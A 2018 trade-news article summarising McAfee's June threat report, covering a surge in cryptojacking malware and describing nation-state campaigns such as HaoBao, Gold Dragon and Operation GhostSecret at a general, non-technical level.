Cryptojacking malware up 600% in Q1

McAfee warns of boom in cryptomining malware as nearly 3 million samples found in first quarter

Tags: CryptocurrencyCryptominigCyber crimeMalwareMcAfee (mcafee.com)
  • E-Mail
Cryptojacking malware up 600% in Q1 Bad actors demonstrated a remarkable level of technical agility and innovation in their methods and tools, says Samani.
By  Mark Sutton Published  June 27, 2018

Cryptojacking malware grew by over 600% from end of 2017 to first quarter of this year, according to McAfee.

The security company said that over 2.9 million samples of coin mining malware were discovered in Q1 2018, a rise from 400,000 in Q4 2017. Cryptojacking malware is malware that infects a user's PC and illicitly mines legitimate cryptocurrencies in the background.

McAfee attributed the 629% rise to the growing popularity of cryptojacking to the ease with which it can generate money for hackers. A typical cryptomining attack diverts funds generated by the cryptocurrency mining directly to the hackers, who do have concern themselves with selling on stolen data, attempting to extract ransom from a victim or otherwise having to monetize their activity or launder the funds.

"Cybercriminals will gravitate to criminal activity that maximizes their profit," said Steve Grobman, chief technology officer at McAfee. "In recent quarters we have seen a shift to ransomware from data-theft, as ransomware is a more efficient crime. With the rise in value of cryptocurrencies, the market forces are driving criminals to crypto-jacking and the theft of cryptocurrency. Cybercrime is a business, and market forces will continue to shape where adversaries focus their efforts."

McAfee Labs Threat Report for June also noted targeted attacks to steal cryptocurrencies. The Lazarus cybercrime ring launched a highly sophisticated Bitcoin-stealing phishing campaign, HaoBao, which targeted global financial organisations and Bitcoin users. When recipients open malicious email attachments, an implant would scan for Bitcoin activity and establishes an implant for persistent data gathering and crypto mining.

The company also noted that the more sophisticated hacking groups also appear to have focused on technical improvements to the most advanced hacking methodologies.

"There were new revelations this quarter concerning complex nation-state cyber-attack campaigns targeting users and enterprise systems worldwide," said Raj Samani, chief scientist at McAfee. "Bad actors demonstrated a remarkable level of technical agility and innovation in tools and tactics. Criminals continued to adopt cryptocurrency mining to easily monetize their criminal activity."

In January, McAfee Advanced Threat Research reported an attack targeting organisations involved in the Pyeongchang Winter Olympics in South Korea. The attack was executed via a malicious Microsoft Word attachment containing a hidden PowerShell implant script. The script was embedded within an image file and executed from a remote server. Dubbed Gold Dragon, the resulting fileless implant encrypted stolen data, sent the data to the attackers' command and control servers, performed reconnaissance functions, and monitored anti-malware solutions to evade them.

Operation GhostSecret targeted the healthcare, finance, entertainment, and telecommunications sectors. Operation GhostSecret is believed to be associated with the international cybercrime group known as Hidden Cobra. The campaign, which employs a series of implants to appropriate data from infected systems, is also characterized by its ability to evade detection and throw forensic investigators off its trail. The latest Bankshot variation of GhostSecret uses an embedded Adobe Flash exploit to enable the execution of implants. It also incorporates elements of the Destover malware, which was used in the 2014 Sony Pictures attack, and the Proxysvc implant, a previously undocumented implant that has operated undetected since mid-2017.

Add a Comment

Your display name This field is mandatory

Your e-mail address This field is mandatory (Your e-mail address won't be published)

Security code